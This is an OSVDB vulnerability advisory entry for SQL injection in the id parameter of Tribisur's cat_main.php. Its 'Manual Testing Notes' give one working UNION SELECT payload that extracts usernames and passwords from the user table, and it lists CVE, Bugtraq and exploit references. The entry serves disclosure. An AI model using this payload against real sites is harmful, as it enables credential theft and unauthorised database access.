Tribisur cat_main.php id Variable SQL Injection

2008-01-05T00:00:00
ID OSVDB:40074
Type osvdb
Reporter OSVDB
Modified 2008-01-05T00:00:00

Description

Manual Testing Notes

cat_main.php?id=-1+union+select+0,concat(pseudo,0x3a,passe),0,0,0,0,0,0+from+utiliz+where+id=1

References:

Secunia Advisory ID:28362 Related OSVDB ID: 40075 ISS X-Force ID: 39443 Generic Exploit URL: http://www.milw0rm.com/exploits/4840 CVE-2008-0133 Bugtraq ID: 27149